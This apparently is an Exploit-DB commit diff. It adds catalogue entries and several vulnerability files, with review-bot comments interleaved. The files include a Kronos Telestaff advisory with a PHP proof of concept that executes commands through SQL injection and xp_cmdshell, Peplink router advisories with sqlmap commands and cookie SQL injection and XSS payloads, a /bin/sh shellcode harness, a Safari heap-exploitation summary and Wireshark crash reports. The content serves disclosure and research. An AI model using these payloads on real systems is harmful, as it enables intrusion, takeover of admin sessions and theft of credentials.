DB: 2017-06-07
8 new exploits
Wireshark 2.2.6 - IPv6 Dissector Denial of Service
Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service
Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution
Home Web Server 1.9.1 build 164 - Remote Code Execution
Linux/x86-64 - /bin/sh Shellcode (31 bytes)
Kronos Telestaff < 2.92EU29 - SQL Injection
WordPress Plugin Tribulant Newsletters 4.6.4.2 - File Disclosure / Cross-Site Scripting
Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure
parent cd6e21e600
commit 0ef7d9b9ec
9 changed files with 799 additions and 0 deletions

files.csv
@ -5528,6 +5528,8 @@ id,file,description,date,author,platform,type,port
42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0
42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-02,n3ckD_,windows,dos,0
42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0
42123,platforms/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
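Review bot: the description for 42124, "Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service", states an upper bound that disagrees with the sibling entry 42123 added in the same hunk, which is dated the same day and names 2.2.6; the committed 42124.txt cites Wireshark bug 13637 and a 2.3.0 development build rather than any 2.2.12 test, so verify the range against that ticket and record the fixed release instead of an open-ended range.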
@ -15565,6 +15567,8 @@ id,file,description,date,author,platform,type,port
42060,platforms/linux/remote/42060.py,"Samba 3.5.0 - Remote Code Execution",2017-05-24,steelo,linux,remote,0
42078,platforms/linux/remote/42078.js,"Google Chrome 60.0.3080.5 V8 JavaScript Engine - Out-of-Bounds Write",2017-05-26,halbecaf,linux,remote,0
42079,platforms/hardware/remote/42079.txt,"CERIO DT-100G-N/DT-300N/CW-300N - Multiple Vulnerabilities",2017-05-28,LiquidWorm,hardware,remote,0
42125,platforms/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,macos,remote,0
42128,platforms/windows/remote/42128.txt,"Home Web Server 1.9.1 build 164 - Remote Code Execution",2017-05-26,"Guillaume Kaddouch",windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
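Review bot: 42125 is filed as platforms/macos/remote/42125.txt, but the file committed under that name is a prose summary of the phoenhex writeup and the exploit itself is only reachable through the linked 42125.zip; the description should name the affected component (JavaScriptCore in Safari 10.1, per the summary) and the csv entry should make clear that the proof of concept is a binary attachment, since a reader of the listing cannot tell that from the .txt extension. Separately, 42128 "Home Web Server 1.9.1 build 164 - Remote Code Execution" has port 0 while the webapps hunk in this same commit records 80 and 443 for comparable HTTP targets; pick one convention for network services.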
@ -16203,6 +16207,7 @@ id,file,description,date,author,platform,type,port
41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0
41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
42016,platforms/windows/shellcode/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode,0
42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
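Review bot: the 42126 description "Linux/x86-64 - /bin/sh Shellcode (31 bytes)" omits the mechanism, whereas the context line 13241 in the previous hunk uses the form "execve /bin/sh Shellcode"; the header of 42126.c describes an execve-based JMP-CALL-POP stub, so naming execve here keeps the listing searchable and consistent with the existing entries. The byte count itself is right: the escaped string in 42126.c is 31 bytes with no embedded NUL, so the strlen check in that harness reports 31.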
@ -37952,3 +37957,6 @@ id,file,description,date,author,platform,type,port
42117,platforms/windows/webapps/42117.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
42118,platforms/windows/webapps/42118.txt,"Subsonic 6.1.1 - Server-Side Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
42120,platforms/windows/webapps/42120.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2017-06-05,hyp3rlinx,windows,webapps,0
42127,platforms/asp/webapps/42127.txt,"Kronos Telestaff < 2.92EU29 - SQL Injection",2017-06-05,"Goran Tuzovic",asp,webapps,0
42129,platforms/php/webapps/42129.txt,"WordPress Plugin Tribulant Newsletters 4.6.4.2 - File Disclosure / Cross-Site Scripting",2017-06-06,defensecode,php,webapps,80
42130,platforms/cgi/webapps/42130.txt,"Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure",2017-06-06,"X41 D-Sec GmbH",cgi,webapps,443
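Review bot: the port column is inconsistent within this hunk: 42129 records 80 and 42130 records 443, but 42127 (a login page reached over HTTP, per the URL field in 42127.txt) is left at 0, as are the three Subsonic context lines above; either populate it or leave all of them at 0. The 42127 author field is "Goran Tuzovic", while the committed 42127.txt credits Chris Anastasio and Mark F. Snodgrass of Illumant under "Discovered by"; one of the two should be corrected or the submitter distinguished from the discoverers. The 42130 description names only SQL Injection / Cross-Site Scripting / Information Disclosure, but the advisory also covers CSRF (CVE-2017-8836), cleartext password storage (CVE-2017-8837) and file deletion (CVE-2017-8841); leading with the unauthenticated SQL injection (CVE-2017-8835, CVSS 9.8) and using "Multiple Vulnerabilities", as the CERIO entry 42079 does, would represent it better.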
99
platforms/asp/webapps/42127.txt
Executable file
@ -0,0 +1,99 @@
Software: Kronos Telestaff Web Application
Version: < 2.92EU29
Homepage: http://www.kronos.com/
CERT VU: VU#958480
CVE: (Pending)
CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-89
Vulnerable Component: Login page

Description
================
The login form is vulnerable to blind SQL injection by an unauthenticated user.


Vulnerabilities
================
The vulnerability is due to the unsanitized POST parameter 'user' in login page:
URL: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POSTDATA=device=stdbrowser&action=doLogin&user=&pwd=&code=

The exploit requires a valid "code" in the post body. However in almost all instances we found on the internet, the "code" POST variable was hard-coded into the page. Furthermore, the "code" POST variable is very often a 4 digit number - and can be easily discovered in ~5000 requests.


Proof of concept
================
PoC 1 - extract data from database
example extract benign data e.g.
Injection Point: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POST data:
device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>

compare timing with

device=stdbrowser&action=doLogin&user=')if(DB_NAME()<>'TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>


PoC 2 - Execute Code Remotely
example inject benign code e.g. ping a remote systems

<?php
$cmd_to_execute = strToHex("ping -n 1 receive_ping_host"); // insert you own host here to detect dns lookup and/or ping; or insert other command
$code=XXXX // insert valid code
$target_url= // insert login page url of target system i.e. example.com/webstaff-2.0/servlet/ServletController.asp?device=stdbrowser&action=doLogin&selfhosted=true
$payload="DECLARE @lphda VARCHAR(280);SET @lphda=".$cmd_to_execute.";EXEC master..xp_cmdshell @lphda";
$payload=str_replace(" ","%20",$payload);
$postdata="device=stdbrowser&action=doLogin&user=')".$payload."---&pwd=test&code=".$code;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_exec($ch);

function strToHex($string){
$hex = '';
for ($i=0; $i<strlen($string); $i++){
$ord = ord($string[$i]);
$hexCode = dechex($ord);
$hex .= substr('0'.$hexCode, -2);
}
return "0x".strToUpper($hex);
}


Affected Systems
================
From Vendor:
Customers running TeleStaff version 2.x with Self Hosted Web Access, those customers who host their own web access, are affected and Kronos recommends that you upgrade to TeleStaff 2.92EU29 or Workforce TeleStaff.


Solution
================
From Vendor:

Though there is no further action needed after the installation of the update there are a couple of best practices that we suggest to further secure the production environment.
1. We recommend that the Web Staff Middle Tier be locked down to only be accessed from the source addresses. For Self-Hosted Web Access this would be the Internet facing IIS server hosting the Self Hosted WebStaff module. For customers using WebStaff (www.telestaff.net) and PSM (psm.telestaff.net and m.telestaff.net) those are the IP addresses of the Kronos servers.
2. Customers, once configured, should remove the viewDatabases.asp script to avoid accidental information leakage to unauthorized users.


Timeline
================
2015-12-18: Discovered
2016-01-04: Contacted Vendor
2016-01-11: Report sent to vendor
2016-01-20: Received acknowledgement of vulnerable from security contact info at vendor
2016-01-20: Vendor is remediating the issue
2016-10-18: Vendor issues patch
2017-06-01: Public disclosure


Discovered by
================
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
Mark F. Snodgrass 0x736e6f646772617373 [ at ] illumant.com


About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/
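Review bot: the header line "CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C)" contradicts itself: a CVSS v2 base score of 10.0 with that vector is the maximum possible and rates High, so "Low" is a typo that should be fixed before the entry is published, since the qualitative label is what most readers skim. "CVE: (Pending)" is still shown at disclosure, seventeen months after the 2016-01-11 report and more than seven months after the 2016-10-18 patch; either fill in the ID (the CERT VU#958480 reference should resolve to it) or state that none was assigned. The vendor mitigation under Solution, item 2, tells customers to remove viewDatabases.asp to prevent information leakage, which is a separate exposure from the login SQL injection this file is about; the advisory should say whether that script is part of the same product surface or an unrelated hardening step, so defenders know whether it is covered by the 2.92EU29 upgrade. Minor: "vulnerable" in the 2016-01-20 timeline line should read "vulnerability", "insert you own host" should read "your", and "a remote systems" should be singular.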
268
platforms/cgi/webapps/42130.txt
Executable file
@ -0,0 +1,268 @@
X41 D-Sec GmbH Security Advisory: X41-2017-005

Multiple Vulnerabilities in peplink balance routers
===================================================

Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/


Summary and Impact
------------------
Several issues have been identified, which allow attackers to access the
administrative web interface with admin credentials, delete files,
perform CSRF and XSS attacks.


Product Description
-------------------
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.



SQL Injection via bauth Cookie
==============================
Severity Rating: Critical
Vector: Network
CVE: CVE-2017-8835
CWE: 89
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary and Impact
------------------
Peplink devices are vulnerable to an SQL injection attack via the bauth
cookie parameter which is set e.g. when accessing
https://ip/cgi-bin/MANGA/admin.cgi.

The injection can be checked with the following command:

./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi"
--cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647"
-p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ
--flush-session -t trace.log --prefix "'" --suffix "--" -a

The vulnerability in the Peplink device allows to access the SQLite
session database containing user and session variables. By using the the
following cookie in a web request, it is possible to select a running
administrator session to be used for the attackers login.

bauth=-12' or id IN (select s.id from sessions as s left join
sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')
or '1'='2

By forming specialised SQL queries, it is possible to retrieve usernames
from the database. This worked by returning a valid session in case the
username existed and no session if it did not exist. In the first case
the server did not set a new session cookie in the response to the request.

SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id
from sessions as s left join sessionsvariables as v on v.id=s.id where
v.name='username' and substr(v.value,1,3)='adm')



Workarounds
-----------
Install vendor supplied update.


No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
The CGI scripts in the administrative interface are not protected
against cross site request forgery attacks. This allows an attacker to
execute commands, if a logged in user visits a malicious website. This
can for example be used to change the credentials of the administrative
webinterface.


Workarounds
-----------
Install vendor supplied update.




Passwords stored in Cleartext
=============================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8837
CWE: 256
CVSS Score: 4.0
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary and Impact
------------------
The Peplink devices store passwords in cleartext in the files
/etc/waipass and /etc/roapass. In case one of these devices is
compromised the attacker can gain access to the cleartext passwords and
abuse them to compromise further systems.


Workarounds
-----------
Install vendor supplied update.




XSS via syncid Parameter
========================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8838
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
If the webinterface is accessible, it is possible to abuse the syncid
parameter to trigger a cross-site-scripting issue by calling
https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E

This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.

Workarounds
-----------
Install vendor supplied update.




XSS via preview.cgi
===================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8839
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
If the webinterface is accessible, it is possible to abuse the the
orig_url parameter to trigger a cross-site-scripting issue in
/guest/preview.cgi. The injection is directly into existing JavaScript.

This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.

Workarounds
-----------
Install vendor supplied update.



File Deletion
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8841
CWE: 73
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Summary and Impact
------------------
A logged in user can delete arbitrary files on the Peplink devices, by
abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path
is provided to the upfile.path parameter the file provided in the path
is deleted during the process. This can be abused to cause a denial of
service (DoS). In combination with the missing CSRF protection, this can
be abused remotely via a logged in user.

Workarounds
-----------
Install vendor supplied update.




Information Disclosure
======================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8840
CWE: 200
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary and Impact
------------------
If the webinterface is accessible, it is possible to retrieve sensitive
information without a valid login by opening
cgi-bin/HASync/hasync.cgi?debug=1

This displays the following:

-----8<------------------------------------------------
Master LAN Address = [ <internal ip> / <netmask> ]
Serial Number = [ <serial number> ]
HA Group ID = [ <group id> ]
Virtual IP = [ <internal ip> / <netmask> ]
Submitted syncid = [ <syncid> ]
-----8<------------------------------------------------

This information can be valuable for an attacker to exploit other issues.

Workarounds
-----------
Install vendor supplied update.




About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.

Timeline
--------
2017-04-07 Issue found
2017-04-10 Vendor asked for security contact
2017-04-11 Vendor replied, send GPG key
2017-04-11 Information supplied to vendor
2017-04-11 Vendor acknowledges that the information is received
2017-04-17 Vendor acknowledges SQL injection
2017-05-08 CVE IDs for all issues requested
2017-05-08 CVE IDs assigned
2017-05-11 Vendor informed about CVE IDs
2017-05-29 Version provided to X41 for testing
2017-05-31 First test results send back to the vendor
2017-06-01 Remaining test results send back to the vendor
2017-06-05 Coordinated Firmware and Advisory release
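Review bot: the "Passwords stored in Cleartext" section lists "Vector: Network" in its header while its CVSS vector says AV:L and the impact text describes reading /etc/waipass and /etc/roapass on an already compromised device; the header field should read Local so the two do not disagree. All seven issues carry the identical workaround "Install vendor supplied update", yet the Overview names a single patched build (7.0.1-build2093) and the timeline records the vendor acknowledging only the SQL injection (2017-04-17); the advisory should state explicitly that 7.0.1-build2093 addresses every one of CVE-2017-8835 through CVE-2017-8841, or list which remain open, since a defender reading only the Overview will assume the former. The information-disclosure section shows hasync.cgi?debug=1 returning the serial number, HA group ID and internal addresses without a login, and the syncid XSS is in the same script; a note that the debug parameter should be disabled or access to cgi-bin/HASync restricted would be a concrete interim mitigation where the firmware cannot be updated at once. Minor wording: "By using the the following cookie" and "abuse the the orig_url parameter" each double "the"; "victims browser" wants an apostrophe; "send back" in the timeline should be "sent back"; "peplink balance routers" in the title should match the capitalisation used in the Models line.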
62
platforms/lin_x86-64/shellcode/42126.c
Executable file
@ -0,0 +1,62 @@
/*
;Title: Linux/x86-64 - /bin/sh Shellcode
;Author: Touhid M.Shaikh
;Contact: https://github.com/touhidshaikh
;Category: Shellcode
;Architecture: Linux x86_64
;Description: This shellcode baased on "JMP CALL POP" method to Execute "/bin//sh". Length of shellcode is 31 bytes.
;Tested on : #1 SMP PREEMPT RT Debian 4.9.25-1kali1 (2017-05-04)



===COMPILATION AND EXECUTION===
#nasm -f elf64 shell.asm -o shell.o

#ld shell.o -o shell <=== Making Binary File


#./bin2shell.sh shell <== xtract hex code from the binary(https://github.com/touhidshaikh/bin2shell)

=================SHELLCODE(INTEL FORMAT)=================

section .text
global _start
_start:
jmp shell
here:
xor rax,rax
pop rdi
xor rsi,rsi
xor rdx,rdx
add rax,59
syscall
shell:
call here
bash db "/bin//sh"

===================END HERE============================

Compile with gcc with some options.

# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing


*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";

main()
{
printf("Touhid Shaikh (http://www.touhidshaikh.com)\n");
printf("Shellcode Length : %d\n", (int)strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

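Review bot: `main()` is declared without a return type, which relies on implicit int (removed in C99; gcc accepts it only with a warning), and `int (*ret)() = (int(*)())code;` combines an unprototyped declaration with a data-to-function pointer cast, so the harness should be written as `int main(void)` with a prototyped pointer type to compile cleanly; the build line in the comment block also names shell-testing.c rather than this file. The stated 31-byte length counts no string terminator: `bash db "/bin//sh"` emits eight bytes and nothing after, and the harness only works because the C literal on the `unsigned char code[]` line appends a NUL; the header should state that assumption next to the length so readers do not take 31 bytes as self-contained. Because the harness executes the bytes from a writable data array, the `-z execstack` flag in the gcc line is what makes that possible; that is worth saying in the comment, since it is the only reason the test works on a stock toolchain. Typos: "baased" in the Description line, "xtract" in the bin2shell comment.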
21
platforms/macos/remote/42125.txt
Executable file
@ -0,0 +1,21 @@
Sources:
https://phoenhex.re/2017-06-02/arrayspread
https://github.com/phoenhex/files/blob/master/exploits/spread-overflow

JavaScriptCore will allocate a JSFixedArray for every spread operand of the array literal (in slow_path_spread). As such, roughly 4 billion JSValues will have to be allocated, taking up 32 GiB in RAM. Luckily, this isn’t much of a problem due to the page compression performed by the macOS kernel. It will, however, take roughly a minute to trigger the bug.

What is left to do now is to perform some heap feng-shui to place something interesting on the heap that we will then overflow into. We use the following heap spray to exploit the bug:

- Allocate 100 JSArrays of size 0x40000 and root them (i.e. keep references). This will trigger GC multiple times and fill up holes in the heap.
- Allocate 100 JSArrays of size 0x40000, where only every second one is rooted. This triggers GC and leaves holes of size 0x40000 in the heap.
- Allocate a larger JSArray and an ArrayBuffer of the same size. These end up directly after the spray from step 2.
- Allocate 4 GiB of padding using JSArrays.
- Trigger the bug by concatenating JSArrays with a combined size of 232 + 0x40000 (containing the repeated byte 0x41).

The target buffer will be allocated in the sprayed region from step 2 and the victim buffers from step 3 will be overwritten. This increases the size of the victim array to the sprayed value (0x4141414141414141), so that it overlaps with the victim ArrayBuffer. The final steps immediately yield the fakeobj and addrof primitives described in section 1.2 of the JavaScriptCore phrack paper which can then be used to write code to a JIT page and jump to it.

In our exploit we perform step 5 in a separate web worker, so that we can launch a second stage shellcode immediately after the victim arrays are overwritten. This way we do not need to wait for the full overwrite to finish, and the heap is only left in a broken state for a very short time, so that garbage collection does not crash (which runs concurrently starting from Safari version 10.1).


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42125.zip
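Review bot: this file carries no exploit text of its own, only an excerpt of the phoenhex writeup and a link to 42125.zip, so the csv description should say that the proof of concept is a binary attachment. In the step-5 bullet, "combined size of 232 + 0x40000" has lost a superscript in transcription: the first paragraph says "roughly 4 billion JSValues", so the intended value is 2^32 + 0x40000 and the bullet should be corrected in the committed file, otherwise the integer-overflow point of the title is invisible in the text. The paragraph "In our exploit we perform step 5" is quoted verbatim from the authors and reads as if the submitter wrote it; mark the excerpt as a quotation with its source, as the two Sources lines already allow. The "JavaScriptCore phrack paper" is cited by section number with no issue or URL, unlike the two Sources lines; add the reference.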
66
platforms/multiple/dos/42123.txt
Executable file
@ -0,0 +1,66 @@
Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3369-g2e2ba64b72)

Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.

Running on Linux 4.10.13-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.

Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1303

Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
wsutil/inet_ipv6.h:111:15: runtime error: member access within null pointer of type 'const struct e_in6_addr'
#0 0x7f2b8106b2b8 in in6_is_addr_multicast wsutil/inet_ipv6.h:111:15
#1 0x7f2b81068247 in dissect_routing6_rpl epan/dissectors/packet-ipv6.c:952:9
#2 0x7f2b81052227 in dissect_routing6 epan/dissectors/packet-ipv6.c:1217:9
#3 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#4 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#5 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#6 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#7 0x7f2b800c8361 in dissect_ayiya epan/dissectors/packet-ayiya.c:134:9
#8 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#9 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#10 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#11 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#12 0x7f2b822f9326 in decode_udp_ports epan/dissectors/packet-udp.c:678:7
#13 0x7f2b8230ee02 in dissect epan/dissectors/packet-udp.c:1131:5
#14 0x7f2b822fe12f in dissect_udp epan/dissectors/packet-udp.c:1137:3
#15 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#16 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#17 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#18 0x7f2b80a62252 in dissect_exported_pdu epan/dissectors/packet-exported_pdu.c:307:17
#19 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#20 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#21 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#22 0x7f2b80b803e7 in dissect_frame epan/dissectors/packet-frame.c:521:11
#23 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#24 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#25 0x7f2b83a9fe87 in call_dissector_only epan/packet.c:2992:8
#26 0x7f2b83a88034 in call_dissector_with_data epan/packet.c:3005:8
#27 0x7f2b83a87054 in dissect_record epan/packet.c:567:3
#28 0x7f2b83a1f398 in epan_dissect_run_with_taps epan/epan.c:474:2
#29 0x561364f21686 in process_packet_single_pass tshark.c:3419:5
#30 0x561364f1a821 in process_cap_file tshark.c:3250:11
#31 0x561364f12549 in main tshark.c:1955:17
#32 0x7f2b754f9510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#33 0x561364dff4f9 in _start (run/tshark+0xd44f9)

SUMMARY: AddressSanitizer: undefined-behavior wsutil/inet_ipv6.h:111:15 in


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42123.zip
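Review bot: the build line is TShark 2.3.0 (v2.3.0rc0-3369-g2e2ba64b72), a development snapshot, while the csv description says "Wireshark 2.2.6"; the file should state which release branches the crash was confirmed on, because a UBSAN report from a master build is not by itself evidence that 2.2.6 is affected. The sanitizer output is a null-pointer member access in in6_is_addr_multicast (wsutil/inet_ipv6.h:111) reached from dissect_routing6_rpl (packet-ipv6.c:952) via the AYIYA and UDP dissectors, i.e. a NULL dereference that crashes the dissector rather than an out-of-bounds read or write; saying so in the description tells a defender the bug class, which "Denial of Service" alone does not. "Attached is the sample" refers to a file that is not in this commit; the only attachment is the 42123.zip link at the end, so the text should point to it. The SUMMARY line ends in "in" with nothing after; that is how UBSAN prints an unnamed frame, but it is worth a note so it is not mistaken for truncation.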
86
platforms/multiple/dos/42124.txt
Executable file
@ -0,0 +1,86 @@
Source: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13637

Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3235-gd97ce76161)

Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.

Running on Linux 4.10.9-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.

Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1216

